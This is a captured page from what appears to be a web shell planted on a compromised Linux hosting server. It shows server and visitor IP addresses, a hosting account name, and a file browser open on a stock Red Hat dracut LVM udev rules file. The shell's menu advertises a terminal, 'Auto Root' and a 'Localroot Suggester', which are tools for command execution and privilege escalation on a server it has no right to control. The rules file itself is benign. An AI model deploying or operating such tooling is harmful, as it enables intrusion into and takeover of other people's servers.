Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
dracut /
modules.d /
90lvm /
Delete
Unzip
Name
Size
Permission
Date
Action
64-lvm.rules
1.28
KB
-rw-r--r--
2022-06-19 22:35
lvm_scan.sh
4.65
KB
-rwxr-xr-x
2022-06-19 22:35
module-setup.sh
3.8
KB
-rwxr-xr-x
2022-06-19 22:35
parse-lvm.sh
491
B
-rwxr-xr-x
2022-06-19 22:35
Save
Rename
# hacky rules to try to activate lvm when we get new block devs... # # Copyright 2008, Red Hat, Inc. # Jeremy Katz <katzj@redhat.com> SUBSYSTEM!="block", GOTO="lvm_end" ACTION!="add|change", GOTO="lvm_end" # If the md device is active (indicated by array_state), then set the flag # LVM_MD_PV_ACTIVATED=1 indicating that the md device for the PV is ready # to be used. The lvm udev rule running in root will check that this flag # is set before it will process the md device (it wants to avoid # processing an md device that exists but is not yet ready to be used.) KERNEL=="md[0-9]*", ACTION=="change", ENV{ID_FS_TYPE}=="LVM2_member", ENV{LVM_MD_PV_ACTIVATED}!="1", TEST=="md/array_state", ENV{LVM_MD_PV_ACTIVATED}="1" # Also don't process disks that are slated to be a multipath device ENV{DM_MULTIPATH_DEVICE_PATH}=="1", GOTO="lvm_end" KERNEL=="dm-[0-9]*", ACTION=="add", GOTO="lvm_end" ENV{ID_FS_TYPE}!="LVM?_member", GOTO="lvm_end" PROGRAM=="/bin/sh -c 'for i in $sys/$devpath/holders/dm-[0-9]*; do [ -e $$i ] && exit 0; done; exit 1;' ", \ GOTO="lvm_end" RUN+="/sbin/initqueue --settled --onetime --unique /sbin/lvm_scan" RUN+="/sbin/initqueue --timeout --name 51-lvm_scan --onetime --unique /sbin/lvm_scan --activationmode degraded" RUN+="/bin/sh -c '>/tmp/.lvm_scan-%k;'" LABEL="lvm_end"